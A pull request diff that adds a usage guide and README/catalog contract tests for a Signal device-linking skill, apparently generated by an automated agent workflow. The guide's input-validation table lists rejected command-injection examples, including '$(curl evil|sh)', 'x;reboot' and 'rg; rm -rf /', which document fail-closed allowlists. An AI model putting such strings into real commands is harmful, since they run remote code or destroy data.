### PR TITLE
Update amplifier-bundle with 5 changed files (#996)

### DIFF
--- a/amplifier-bundle/skills/signal-setup/README.md
+++ b/amplifier-bundle/skills/signal-setup/README.md
@@ -4,8 +4,10 @@ Link a host — local machine or a remote **azlin** Azure VM — to **Signal** a
 linked device, END-TO-END, and wire it into amplihack's Signal channel. The
 whole manual device-linking loop becomes one idempotent command.
 
-See [`SKILL.md`](./SKILL.md) for the full flow and the critical facts. The
-executable lives at [`scripts/signal-setup.sh`](./scripts/signal-setup.sh).
+See [`SKILL.md`](./SKILL.md) for the full flow and the critical facts, and
+[`USAGE.md`](./USAGE.md) for the full CLI reference, configuration, tutorials,
+and troubleshooting. The executable lives at
+[`scripts/signal-setup.sh`](./scripts/signal-setup.sh).
 
 ## Quick start
 

--- a/amplifier-bundle/skills/signal-setup/SKILL.md
+++ b/amplifier-bundle/skills/signal-setup/SKILL.md
@@ -239,6 +239,8 @@ anchors, and the security invariants that must not regress.
 
 ## See also
 
+- [`USAGE.md`](./USAGE.md) — full CLI reference, configuration, tutorials, and
+  troubleshooting for this skill
 - `docs/SIGNAL_ONBOARDING.md`, `docs/signal-channel.md`
 - [`SECURITY.md`](./SECURITY.md) — security hardening reference for this skill
 - `crates/amplihack-signal/`, `crates/amplihack-cli/src/commands/signal/`

--- a/amplifier-bundle/skills/signal-setup/USAGE.md
+++ b/amplifier-bundle/skills/signal-setup/USAGE.md
@@ -1,0 +1,319 @@
+# signal-setup — Usage & Tutorial Guide
+
+End-to-end, idempotent Signal device-linking for amplihack, for a **local**
+machine or a **remote azlin Azure VM**. One command runs the whole loop:
+prerequisite check → prompt → mint a device-link under `systemd-run` → render
+the QR **directly in your terminal** (zero delivery latency) → verify linkage →
+optionally start the JSON-RPC daemon, ensure the amplihack self-group, and post
+a test message.
+
+This guide is the task-oriented companion to the reference docs:
+
+- [`SKILL.md`](./SKILL.md) — the canonical flow, invariants, and critical facts.
+- [`SECURITY.md`](./SECURITY.md) — threat model and hardening reference.
+- [`README.md`](./README.md) — one-screen quick start.
+
+If you only want to link a host right now, jump to
+[Tutorial 1: Link the local host](#tutorial-1-link-the-local-host).
+
+---
+
+## Table of contents
+
+1. [Prerequisites](#prerequisites)
+2. [The command](#the-command)
+3. [CLI reference](#cli-reference)
+4. [Configuration (environment variables)](#configuration-environment-variables)
+5. [Tutorials](#tutorials)
+6. [Verifying a link](#verifying-a-link)
+7. [Troubleshooting](#troubleshooting)
+8. [Exit codes & idempotency](#exit-codes--idempotency)
+9. [How it works (mental model)](#how-it-works-mental-model)
+10. [See also](#see-also)
+
+---
+
+## Prerequisites
+
+Install these on **the machine that renders the QR** — that is the local host
+when linking locally, or **your local machine** when linking a remote VM.
+
+| Requirement        | Where             | Install / note                                                             |
+| ------------------ | ----------------- | -------------------------------------------------------------------------- |
+| `signal-cli` 0.14.5 | target host       | `~/.local/bin/signal-cli` → `~/.local/opt/signal-cli-0.14.5/bin/signal-cli` |
+| `qrencode`         | rendering machine | `apt-get install -y qrencode`                                              |
+| `systemd-run` / `systemctl` | target host | present on standard systemd hosts                                          |
+| `az` CLI           | rendering machine | remote hosts only; needs `az vm run-command` rights on the RG              |
+| `nc` (netcat)      | daemon host       | only for the optional daemon post-test                                     |
+
+The known-good `signal-cli` version is **0.14.5**. Other versions may change
+the provisioning-socket behavior the 60-second window depends on.
+
+---
+
+## The command
+
+```
+amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh --host <name> [options]
+```
+
+- `--host local` (or the current hostname) mints **locally**.
+- Any other `--host` name is treated as a **remote azlin VM**; the mint runs on
+  the VM via `az vm run-command`, and the QR is rendered **locally** from the
+  returned `sgnl://` URI.
+
+Show the built-in help at any time:
+
+```bash
+scripts/signal-setup.sh --help
+```
+
+---
+
+## CLI reference
+
+| Flag                     | Argument   | Default                    | Description                                                                                 |
+| ------------------------ | ---------- | -------------------------- | ------------------------------------------------------------------------------------------- |
+| `--host`                 | `<name>`   | _(required)_               | Target host. `local`/current hostname → local mint; any other name → remote azlin VM.       |
+| `--phone`                | `<+E164>`  | `$SIGNAL_PHONE`            | Signal phone number (E.164, e.g. `+15551234567`). Required for verify/daemon/group steps.   |
+| `--group`                | `<name>`   | `amplihack`                | Self-group display name for the post-test.                                                  |
+| `--resource-group`       | `<rg>`     | `rysweet-linux-vm-pool`    | Azure resource group for remote hosts. Flows into `az vm run-command -g`.                    |
+| `--local`                | —          | auto                       | Force a local mint regardless of `--host`.                                                   |
+| `--remote`               | —          | auto                       | Force a remote mint regardless of `--host`.                                                  |
+| `--no-daemon`            | —          | daemon on                  | Skip the daemon + self-group + post-test step (link only).                                  |
+| `--daemon`               | —          | _(default)_                | Force the daemon + self-group + post-test step.                                             |
+| `-y`, `--yes`            | —          | interactive                | Non-interactive: assume the phone's scan screen is already open. Skips the confirm prompt.  |
+| `-h`, `--help`           | —          | —                          | Print usage and exit 0.                                                                      |
+
+### Input validation (fail-closed)
+
+Operator-controlled inputs are validated against strict allowlists **before any
+use** (they flow into shell command lines, the root-executed remote payload, and
+JSON-RPC strings). A non-matching value aborts with a non-zero exit and **no**
+side effects.
+
+| Input              | Allowlist                     | Examples accepted                              | Examples rejected                       |
+| ------------------ | ----------------------------- | ---------------------------------------------- | --------------------------------------- |
+| `--host`           | `^[A-Za-z0-9._-]+$`           | `local`, `deva`, `ia3.internal`                | `x;reboot`, `$(curl evil|sh)`           |
+| `--resource-group` | `^[A-Za-z0-9._()-]+$`         | `rysweet-linux-vm-pool`, `my_rg(prod)`         | `rg; rm -rf /`                          |
+| `--group`          | `^[A-Za-z0-9._ -]+$`          | `amplihack`, `"amplihack fleet"`               | `a","evil":"`                           |
+| `--phone`          | `^\+[1-9][0-9]{7,14}$`        | `+15551234567`                                 | `15551234567` (no `+`), `+1 555; id`    |
+
+See [`SECURITY.md` §3](./SECURITY.md) for the full rationale and invariants.
+
+---
+
+## Configuration (environment variables)
+
+| Variable                             | Default                 | Purpose                                                                                       |
+| ------------------------------------ | ----------------------- | --------------------------------------------------------------------------------------------- |
+| `SIGNAL_PHONE`                       | _(unset)_               | Default for `--phone`.                                                                         |
+| `SIGNAL_SETUP_RG`                    | `rysweet-linux-vm-pool` | Default Azure resource group.                                                                  |
+| `SIGNAL_SETUP_VERIFY_TIMEOUT_SECONDS`| `55`                    | Linkage-verify budget. Raise on slow remote hosts (one `az run-command` poll can take ~90s).  |
+| `SIGNAL_SETUP_AZ_TIMEOUT_SECONDS`    | `90`                    | `az vm run-command` invocation timeout.                                                        |
+| `SIGNAL_SETUP_LOCAL_TIMEOUT_SECONDS` | `10`                    | Local `signal-cli` probe timeout.                                                              |
+| `SIGNAL_SETUP_DAEMON_WAIT_ATTEMPTS`  | `20`                    | Half-second daemon/URI poll attempts.                                                          |
+| `SIGNAL_SETUP_RPC_TIMEOUT_SECONDS`   | `15`                    | JSON-RPC `nc` timeout.                                                                         |
+| `SIGNAL_SETUP_DAEMON_TCP`            | `127.0.0.1:7583`        | Loopback daemon endpoint. **Loopback-only, fail-closed**: only `127.0.0.1`/`localhost` + numeric port accepted. |
+
+> **Security:** `SIGNAL_SETUP_DAEMON_TCP` is validated at startup; routable
+> hosts (`0.0.0.0`, LAN IPs) and IPv6/multi-colon forms are rejected before any
+> daemon is spawned. Never expose the unauthenticated JSON-RPC daemon off-box.
+
+---
+
+## Tutorials
+
+> **Path convention:** the first two tutorials spell out the full
+> `amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh` path from the
+> repo root. Later tutorials use the shorter `scripts/signal-setup.sh` form,
+> which assumes your shell is in the skill directory
+> (`amplifier-bundle/skills/signal-setup/`). Both invoke the same script — use
+> whichever matches your working directory.
+
+### Tutorial 1: Link the local host
+
+Interactive, with the daemon post-test:
+
+```bash
+# 1. Open Signal on your phone: Settings ▸ Linked Devices ▸ Link New Device
+#    Leave the camera/scan screen open BEFORE you run the command.
+
+# 2. Run the setup (it will prompt you to confirm the scan screen is ready):
+amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh \
+  --host local --phone +15551234567
+```
+
+The QR prints directly in your terminal. **Scan it immediately** — it is valid
+for only ~60 seconds. On success the script verifies the link, starts the
+JSON-RPC daemon on `127.0.0.1:7583`, ensures the `amplihack` self-group, and
+posts a test message.
+
+### Tutorial 2: Link a remote azlin VM
+
+The mint runs on the VM via `az vm run-command`; the QR renders **locally**, so
+only the short `sgnl://` URI crosses the network:
+
+```bash
+amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh \
+  --host deva --phone +15551234567 \
+  --resource-group rysweet-linux-vm-pool
+```
+
+Requirements: `az` logged in with `az vm run-command` rights on the RG, and
+`qrencode` installed **locally**.
+
+> **azlin gotchas:** only ONE bastion/azlin session per VM at a time, and never
+> pipe `azlin`/`az` output into an early-closing consumer (SIGPIPE core-dumps
+> `azlin`). The script already captures full output before filtering.
+
+### Tutorial 3: Non-interactive (scan screen already open)
+
+Skip the confirmation prompt when you have already opened the scan screen:
+
+```bash
+scripts/signal-setup.sh --host dev -y --phone +15551234567
+```
+
+### Tutorial 4: Link only, skip the daemon/group/post-test
+
+```bash
+scripts/signal-setup.sh --host dev --no-daemon
+```
+
+Useful when the amplihack channel wiring is handled elsewhere, or you only need
+device linkage.
+
+### Tutorial 5: Re-verify an already-linked host (idempotent)
+
+Re-running against a host that is already linked (detected via
+`signal-cli listAccounts`) does **not** re-mint. It skips straight to the
+daemon/self-group/post-test verification and exits successfully:
+
+```bash
+scripts/signal-setup.sh --host local --phone +15551234567
+# → "already linked" → (re)ensures daemon + self-group → exit 0
+```
+
+### Tutorial 6: Custom self-group name
+
+```bash
+scripts/signal-setup.sh --host local --phone +15551234567 \
+  --group "amplihack fleet"
+```
+
+---
+
+## Verifying a link
+
+A link is confirmed when **any** of these hold:
+
+- `signal-cli listAccounts` shows `Number: +<phone>`.
+- The transient `sig-link-<host>` systemd unit becomes `inactive`.
+- The trace log (path printed on a verification failure) shows
+  `Associated with: +<phone>` followed by `Finishing new device registration`.
+
+Daemon post-test success:
+
+- Daemon: `signal-cli -a +<phone> daemon --tcp 127.0.0.1:7583`.
+- Self-group: JSON-RPC `updateGroup{account,name}` returns a `groupId`.
+- Post-test: JSON-RPC `send{account,groupId,message}` returns
+  `{"results":[],"timestamp":...}`. An **empty `results` array is expected
+  success** for a self-only group.
+
+---
+
+## Troubleshooting
+
+### "invalid response from server" on the phone
+
+Almost always the **expired-QR / 60-second-window** failure. Signal's
+provisioning websocket closes with server code **1001 at ~+60s** after the QR is
+minted. Any delivery path slower than a few seconds expires the QR.
+
+**Fix:**
+
+1. Open the phone's scan screen **first**, then run the command.
+2. Scan the terminal QR **immediately** when it prints.
+3. Never route the QR through Signal itself (the deprecated slow path).
+4. For remote hosts, keep using in-terminal local rendering (the default) — do
+   not relay the QR through a remote daemon.
+
+### QR is invisible / unscannable on a dark terminal
+
+The script renders with `qrencode -t ANSIUTF8i` — the trailing **`i` (inverted)**
+is required for dark backgrounds. Plain `ANSIUTF8` is dark-on-dark and
+effectively invisible. If you customize rendering, keep the `i`.
+
+### Spurious re-mint on a slow remote host
+
+A single `az vm run-command` poll can take ~90s. If verification times out and
+the script tries to re-mint an already-linked host, raise the budget:
+
+```bash
+SIGNAL_SETUP_VERIFY_TIMEOUT_SECONDS=120 \
+  scripts/signal-setup.sh --host deva --phone +15551234567
+```
+
+### "Multiple Signal accounts found"
+
+Re-run with an explicit `--phone` to select the account:
+
+```bash
+scripts/signal-setup.sh --host local --phone +15551234567
+```
+
+### Remote link fails / `az` errors
+
+- Confirm `az login` and that your identity has `az vm run-command` rights on the
+  `--resource-group`.
+- Ensure only **one** bastion/azlin session targets the VM.
+- On failure, the `-vv` trace log is retained (`0600`) and its path printed for
+  diagnosis; it never contains the `sgnl://` link secret.
+
+---
+
+## Exit codes & idempotency
+
+- **0** — success, including the idempotent "already linked" fast path.
+- **non-zero** — invalid input (fail-closed validation), missing prerequisites,
+  or a link/verify failure. Secrets are cleaned up on every exit path
+  (`trap ... EXIT INT TERM`); the `sgnl://` URI is always purged.
+
+The script is safe to re-run: an already-linked host is detected and re-mint is
+skipped. Only the daemon/self-group/post-test is (re)ensured.
+
+---
+
+## How it works (mental model)
+
+1. **Prereq check** — `signal-cli` (0.14.5), `qrencode`, `systemd-run` on target;
+   plus `az` + local `qrencode` for remote hosts.
+2. **Idempotency probe** — `listAccounts` showing `Number: +<phone>` → skip mint.
+3. **Prompt** — you confirm the phone scan screen is open (skipped with `-y`).
+4. **Mint** — `signal-cli link -n amplihack-<host>` under a transient
+   `systemd-run` unit (`sig-link-<host>`), so it survives the launching shell.
+5. **Render QR** — `qrencode -t ANSIUTF8i`, piped via **stdin** (secret never on
+   argv). Scan within ~60s.
+6. **Verify** — poll `listAccounts`; the transient unit goes `inactive` on
+   success.
+7. **Daemon + self-group + post-test** (default) — daemon on `127.0.0.1:7583`,
+   self-only group, and a self-send post-test.
+
+The three load-bearing facts: the **60-second window**, **`ANSIUTF8i` inverted**
+rendering, and **`systemd-run` persistence** (with `--uid=azureuser` remotely,
+since `az vm run-command` runs as root). See [`SKILL.md`](./SKILL.md) for the
+full treatment.
+
+---
+
+## See also
+
+- [`SKILL.md`](./SKILL.md) — canonical flow, invariants, and critical facts.
+- [`SECURITY.md`](./SECURITY.md) — threat model, input allowlists, secret
+  temp-file regime, JSON-RPC escaping, trust anchors.
+- [`README.md`](./README.md) — one-screen quick start.
+- `docs/SIGNAL_ONBOARDING.md`, `docs/signal-channel.md` — repo-level Signal
+  onboarding and channel docs.
+- `crates/amplihack-signal/`, `crates/amplihack-cli/src/commands/signal/` — the
+  Rust integration this skill's linking loop feeds into.

--- a/amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh
@@ -14,6 +14,11 @@
 #                                 mocked signal-cli/qrencode/systemd-run/az/sudo/nc
 #                                 (help, validation, injection fail-closed,
 #                                 idempotency-renders-no-QR, prereq failures).
+#   3. test_readme_and_catalog.sh — the content absorbed from PR #1001: the
+#                                 README overview (links resolve, hard-won facts
+#                                 preserved) and the docs/skills/SKILL_CATALOG.md
+#                                 registration (correct alphabetical slot,
+#                                 self-consistent counts, no version-bump files).
 #
 # Hollow-pass guard: a suite that silently ran zero assertions (or aborted early
 # before printing its summary) yet still exited 0 must NOT be reported as green.
@@ -37,6 +42,7 @@ MIN_TOTAL_SCENARIOS="${MIN_TOTAL_SCENARIOS:-40}"
 SUITES=(
   "test_skill_structure.sh"
   "test_script_behavior.sh"
+  "test_readme_and_catalog.sh"
 )
 
 TOTAL_FAIL=0

--- a/amplifier-bundle/skills/signal-setup/tests/test_readme_and_catalog.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/test_readme_and_catalog.sh
@@ -1,0 +1,260 @@
+#!/usr/bin/env bash
+# TDD contract tests for the content ABSORBED from PR #1001 into the
+# `signal-setup` skill:
+#
+#   1. amplifier-bundle/skills/signal-setup/README.md   (the ported overview)
+#   2. docs/skills/SKILL_CATALOG.md registration        (the catalog row)
+#
+# These two artifacts previously had ZERO executable coverage. This suite is
+# their executable specification. Each assertion names exactly which part of the
+# absorbed contract is unmet when it fails.
+#
+# Run: bash amplifier-bundle/skills/signal-setup/tests/test_readme_and_catalog.sh
+#
+# Self-contained: no network, no build. grep/awk only, matching the pattern used
+# by test_skill_structure.sh in this same directory.
+#
+# The absorption had two hard constraints beyond "the files exist":
+#   * README content must stay consistent with the SKILL.md contract (the same
+#     hard-won facts: 60s/code-1001 window, ANSIUTF8i, systemd-run, daemon on
+#     127.0.0.1:7583, the --host contract, idempotency, never-relay-the-QR).
+#   * The catalog row must sit in the correct alphabetical slot AND keep the
+#     summary counts self-consistent (declared == rows == unique names), or the
+#     catalog self-check fails. Version-bump files must NOT have been dragged in.
+
+set -uo pipefail
+
+PASS=0
+FAIL=0
+pass() { echo "  PASS: $1"; PASS=$((PASS + 1)); }
+fail() { echo "  FAIL: $1"; FAIL=$((FAIL + 1)); }
+
+SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+SKILL_DIR="$(dirname "$SCRIPT_DIR")"
+README="$SKILL_DIR/README.md"
+SKILL_FILE="$SKILL_DIR/SKILL.md"
+USAGE_FILE="$SKILL_DIR/USAGE.md"
+IMPL="$SKILL_DIR/scripts/signal-setup.sh"
+
+# Locate the repo root so we can find docs/skills/SKILL_CATALOG.md regardless of
+# where the runner is invoked from. Walk up until we find the docs catalog.
+find_catalog() {
+  local d="$SKILL_DIR"
+  while [[ "$d" != "/" ]]; do
+    if [[ -f "$d/docs/skills/SKILL_CATALOG.md" ]]; then
+      echo "$d/docs/skills/SKILL_CATALOG.md"
+      return 0
+    fi
+    d="$(dirname "$d")"
+  done
+  return 1
+}
+CATALOG="$(find_catalog || true)"
+
+# grep helpers (case-insensitive by default; _f = fixed string).
+g()  { grep -qiE -- "$1" "$2" 2>/dev/null; }
+gf() { grep -qiF -- "$1" "$2" 2>/dev/null; }
+
+echo "═══════════════════════════════════════════════════════"
+echo "  Test Suite: signal-setup — Absorbed README + Catalog"
+echo "═══════════════════════════════════════════════════════"
+
+# ─── Test 1: README exists and its internal links resolve ────────────────────
+echo ""
+echo "Test 1: README.md exists and links to real targets"
+
+if [[ -f "$README" ]]; then
+  pass "README.md exists"
+else
+  fail "README.md not found at $README"
+  echo "Results: $PASS passed, $FAIL failed"; exit 1
+fi
+
+# The README advertises these three companion files; each link target must exist.
+if gf "(./SKILL.md)" "$README" && [[ -f "$SKILL_FILE" ]]; then
+  pass "README links to SKILL.md and target resolves"
+else
+  fail "README must link to ./SKILL.md and the file must exist"
+fi
+
+if gf "(./USAGE.md)" "$README" && [[ -f "$USAGE_FILE" ]]; then
+  pass "README links to USAGE.md and target resolves"
+else
+  fail "README must link to ./USAGE.md and the file must exist"
+fi
+
+if gf "(./scripts/signal-setup.sh)" "$README" && [[ -f "$IMPL" ]]; then
+  pass "README links to scripts/signal-setup.sh and target resolves"
+else
+  fail "README must link to ./scripts/signal-setup.sh and the file must exist"
+fi
+
+# ─── Test 2: README preserves the hard-won facts (consistency w/ SKILL.md) ────
+echo ""
+echo "Test 2: README preserves the skill's hard-won facts"
+
+# 60-second provisioning window + close code 1001.
+if g "60" "$README" && g "1001" "$README"; then
+  pass "README documents the ~60s window and close code 1001"
+else
+  fail "README must document the 60s window AND socket close code 1001"
+fi
+
+# ANSIUTF8i inverted QR rendering (dark-terminal-safe).
+if gf "ANSIUTF8i" "$README"; then
+  pass "README documents ANSIUTF8i (inverted) QR rendering"
+else
+  fail "README must name the ANSIUTF8i inverted QR mode"
+fi
+
+# systemd-run persistence, including the remote --uid=azureuser gotcha.
+if gf "systemd-run" "$README" && gf "--uid=azureuser" "$README"; then
+  pass "README documents systemd-run persistence + remote --uid=azureuser"
+else
+  fail "README must document systemd-run and the --uid=azureuser remote gotcha"
+fi
+
+# Daemon endpoint 127.0.0.1:7583.
+if gf "127.0.0.1:7583" "$README"; then
+  pass "README documents the daemon endpoint 127.0.0.1:7583"
+else
+  fail "README must name the JSON-RPC daemon endpoint 127.0.0.1:7583"
+fi
+
+# The --host contract is the primary interface.
+if gf "--host" "$README"; then
+  pass "README documents the --host contract"
+else
+  fail "README must document the --host flag (primary interface)"
+fi
+
+# Idempotency guarantee.
+if g "idempotent" "$README"; then
+  pass "README documents idempotency"
+else
+  fail "README must state the command is idempotent"
+fi
+
+# Never relay the QR through Signal itself (the deprecated slow path).
+if g "[Nn]ever .*(through|via) Signal" "$README" || g "never deliver the QR" "$README"; then
+  pass "README warns: never deliver the QR through Signal itself"
+else
+  fail "README must warn against delivering the QR through Signal (deprecated relay)"
+fi
+
+# ─── Test 3: Catalog registration — presence + exact bundle path ─────────────
+echo ""
+echo "Test 3: SKILL_CATALOG.md registers signal-setup"
+
+if [[ -n "$CATALOG" && -f "$CATALOG" ]]; then
+  pass "SKILL_CATALOG.md located"
+else
+  fail "docs/skills/SKILL_CATALOG.md not found by walking up from skill dir"
+  echo "Results: $PASS passed, $FAIL failed"; exit 1
+fi
+
+# The row must use the exact bundle path the generator emits.
+# shellcheck disable=SC2016  # literal backticks are catalog markdown, not expansion
+if grep -qF '| `signal-setup` | `signal-setup/SKILL.md` |' "$CATALOG"; then
+  pass "catalog contains the signal-setup row with correct bundle path"
+else
+  fail "catalog must contain: | \`signal-setup\` | \`signal-setup/SKILL.md\` |"
+fi
+
+# ─── Test 4: Catalog row sits in the correct alphabetical slot ───────────────
+echo ""
+echo "Test 4: signal-setup occupies the correct alphabetical slot"
+
+# Ordered list of skill names exactly as they appear as table rows.
+# shellcheck disable=SC2016  # literal backticks are catalog markdown, not expansion
+mapfile -t CAT_NAMES < <(grep -oE '^\| `[a-z0-9-]+`' "$CATALOG" | sed -E 's/^\| `([a-z0-9-]+)`/\1/')
+
+# Find signal-setup's neighbours in emission order.
+prev=""; next=""; found=""
+for i in "${!CAT_NAMES[@]}"; do
+  if [[ "${CAT_NAMES[$i]}" == "signal-setup" ]]; then
+    found=1
+    [[ $i -gt 0 ]] && prev="${CAT_NAMES[$((i-1))]}"
+    next_idx=$((i+1))
+    [[ $next_idx -lt ${#CAT_NAMES[@]} ]] && next="${CAT_NAMES[$next_idx]}"
+    break
+  fi
+done
+
+if [[ -n "$found" ]]; then
+  pass "signal-setup present in catalog row list"
+else
+  fail "signal-setup missing from catalog row list"
+fi
+
+# 'sig' sorts after 'sha' (shadow-*) and before 'sil' (silent-*).
+if [[ "$prev" == "shadow-testing" ]]; then
+  pass "predecessor row is shadow-testing (correct)"
+else
+  fail "predecessor should be shadow-testing, got '${prev:-<none>}'"
+fi
+
+if [[ "$next" == "silent-degradation-audit" ]]; then
+  pass "successor row is silent-degradation-audit (correct)"
+else
+  fail "successor should be silent-degradation-audit, got '${next:-<none>}'"
+fi
+
+# Whole table must be strictly ascending (defends the slot globally).
+sorted_ok=1
+for ((i=1; i<${#CAT_NAMES[@]}; i++)); do
+  if [[ "${CAT_NAMES[$((i-1))]}" > "${CAT_NAMES[$i]}" ]]; then
+    sorted_ok=0
+    echo "    ordering break: '${CAT_NAMES[$((i-1))]}' > '${CAT_NAMES[$i]}'"
+  fi
+done
+if [[ "$sorted_ok" -eq 1 ]]; then
+  pass "catalog rows are in strict alphabetical order"
+else
+  fail "catalog rows are NOT strictly alphabetical (see breaks above)"
+fi
+
+# ─── Test 5: Catalog summary counts stay self-consistent ─────────────────────
+echo ""
+echo "Test 5: catalog summary counts are self-consistent"
+
+row_count="${#CAT_NAMES[@]}"
+uniq_count="$(printf '%s\n' "${CAT_NAMES[@]}" | sort -u | wc -l | tr -d ' ')"
+declared_unique="$(grep -oE 'Unique bundled skill names:\*\* [0-9]+' "$CATALOG" | grep -oE '[0-9]+' | head -1)"
+declared_defs="$(grep -oE 'Skill definition files:\*\* [0-9]+' "$CATALOG" | grep -oE '[0-9]+' | head -1)"
+
+if [[ "$row_count" -eq "$uniq_count" ]]; then
+  pass "no duplicate skill rows ($row_count rows == $uniq_count unique)"
+else
+  fail "duplicate rows: $row_count rows but only $uniq_count unique names"
+fi
+
+if [[ -n "$declared_unique" && "$declared_unique" -eq "$uniq_count" ]]; then
+  pass "declared 'Unique bundled skill names' ($declared_unique) == actual unique ($uniq_count)"
+else
+  fail "declared unique count '${declared_unique:-<none>}' != actual unique $uniq_count"
+fi
+
+if [[ -n "$declared_defs" && "$declared_defs" -eq "$row_count" ]]; then
+  pass "declared 'Skill definition files' ($declared_defs) == actual rows ($row_count)"
+else
+  fail "declared definition count '${declared_defs:-<none>}' != actual rows $row_count"
+fi
+
+# ─── Test 6: Absorption dragged in NO version-bump files ─────────────────────
+echo ""
+echo "Test 6: version-bump exclusion invariant"
+
+# The absorption was documentation-only. Neither the skill dir nor the catalog
+# change should have introduced dependency/version manifests. A stray Cargo.toml
+# or package.json inside the skill would signal an over-broad cherry-pick.
+if find "$SKILL_DIR" -maxdepth 3 \( -name Cargo.toml -o -name Cargo.lock -o -name package.json \) 2>/dev/null | grep -q .; then
+  fail "signal-setup skill dir must not contain Cargo/package manifests"
+  find "$SKILL_DIR" -maxdepth 3 \( -name Cargo.toml -o -name Cargo.lock -o -name package.json \) 2>/dev/null | sed 's/^/    stray: /'
+else
+  pass "no Cargo/package manifests under the skill dir (version-bump excluded)"
+fi
+
+echo ""
+echo "Results: $PASS passed, $FAIL failed"
+[[ "$FAIL" -eq 0 ]]


### PR DESCRIPTION
## Summary
Concise workflow-generated PR for amplifier-bundle.

## Issue
Closes #996

## Changed files
- amplifier-bundle/skills/signal-setup/README.md
- amplifier-bundle/skills/signal-setup/SKILL.md
- amplifier-bundle/skills/signal-setup/USAGE.md
- amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh
- amplifier-bundle/skills/signal-setup/tests/test_readme_and_catalog.sh

## Diff stat
```text
 amplifier-bundle/skills/signal-setup/README.md     |   6 +-
 amplifier-bundle/skills/signal-setup/SKILL.md      |   2 +
 amplifier-bundle/skills/signal-setup/USAGE.md      | 319 +++++++++++++++++++++
 .../skills/signal-setup/tests/run_all_tests.sh     |   6 +
 .../signal-setup/tests/test_readme_and_catalog.sh  | 260 +++++++++++++++++
 5 files changed, 591 insertions(+), 2 deletions(-)
```

## Behavior
Implemented behavior through these branch commits:
f732e5ab docs(signal-setup): add USAGE guide and README/catalog contract tests

## Validation
ℹ NODE_OPTIONS=--max-old-space-size=32768 (saved preference). To change: /home/azureuser/.amplihack/config
I'll start by understanding the current state of the branch and changes.

● Get branch, status, and recent log (shell)
  │ cd /home/azureuser/src/amplihack-rs/worktrees/feat/issue-996-absorb-pr-1001-signal-setup-readme-
  │ and-skillcatalo && git branch --show-current && echo "---STATUS---" && git status && echo
  │ "---LOG---" && git --no-pager log --oneline -10
  └ 19 lines…

Let me see the changed files in the recent commits related to this task.

● Show changed files in relevant commits (shell)

## Risk
No high-risk subsystem pattern detected from changed paths.

## Checklist
- [x] Branch has 1 commit(s) ahead of main
- [ ] Code review completed
- [ ] Philosophy check passed

---
*This PR was created as a draft for review before merging.*

---

## Step 16b: Outside-In Testing Results

Tested from the PR branch (`feat/issue-996-absorb-pr-1001-signal-setup-readme-and-skillcatalo`) as a consumer of the `signal-setup` skill would exercise it.

### Detected toolchains
- Root repo manifests present: `Cargo.toml`, `Cargo.lock`, `package.json`, `pyproject.toml` (polyglot workspace).
- **Branch changes are 100% within `amplifier-bundle/skills/signal-setup/`** — Bash test scripts + Markdown docs (`README.md`, `SKILL.md`, `USAGE.md`, `tests/*.sh`). No Rust/Node/Python source or manifest was touched.
- Version-bump exclusion verified: no `Cargo.toml` / `Cargo.lock` / `package.json` / `package-lock` / `pyproject.toml` changes in the branch diff vs `origin/main`.

### Chosen strategy
Because the changed surface is the skill's own bundled Bash test suites, the correct outside-in boundary is **running those suites directly** (they self-validate the absorbed README content and the `SKILL_CATALOG.md` registration contract). The polyglot root toolchains were intentionally not exercised — no code in those toolchains changed.

### Scenarios

| # | Type | Command | Result | Key output |
|---|------|---------|--------|------------|
| 1 | Simple (contract) | `bash amplifier-bundle/skills/signal-setup/tests/test_readme_and_catalog.sh` | ✅ PASS | `Results: 21 passed, 0 failed` — README links resolve, hard-won facts preserved, catalog row in correct alphabetical slot (between `shadow-testing` and `silent-degradation-audit`), counts self-consistent (122/122), no version-bump manifests under skill dir |
| 2 | Edge / integration | `bash amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh` | ✅ PASS | `Total passing assertions: 120 (floor: 40)` / `ALL SUITES PASSED` — structure (58), mocked script behavior incl. injection fail-closed & idempotency (41), README+catalog (21); hollow-pass guards satisfied |

### Fix count
**0** — all 120 assertions passed on the first run; no diagnose/fix/commit iterations were required.

### Verification summary
- Branch is **0 commits behind `origin/main`** (no rebase needed); catalog registration for `signal-setup` already present at `docs/skills/SKILL_CATALOG.md` and consistent with the absorbed README.
- CI: GitGuardian Security Checks **pass**; `scan` skipping; Lint & Format queued/running at time of writing.
- Stopped before merge as instructed.
